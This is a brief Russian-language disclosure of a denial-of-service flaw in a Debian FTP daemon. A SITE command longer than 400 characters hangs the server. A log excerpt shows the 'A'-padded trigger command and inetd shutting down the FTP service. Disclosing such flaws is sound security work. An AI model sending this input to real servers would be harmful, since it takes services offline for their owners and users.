Уязвимость обнаружена
в Debian FTP Daemon. Суть: если в команде SITE большее
400 символов, то сервер вешается.

Пример:

May 18 12:32:46 ts ftpd[677]: ts FTP server (Version
6.2/OpenBSD/Linux-0.10) ready.
May 18 12:32:47 ts ftpd[677]: command: SITE
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
(повторить верхние 2 строчки еще раз 6)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAA
May 18 12:32:47 ts ftpd[677]: <— 500
May 18 12:32:47 ts ftpd[677]: ‘SITE
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
(повторить еще 6 раз)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAA
‘: command not understood.
May 18 12:32:47 ts ftpd[677]: <— 221
May 18 12:32:47 ts ftpd[677]: You could at least say goodbye.
May 18 12:32:47 ts inetd[139]: ftp/tcp server failing (looping), service
terminated



Оставить мнение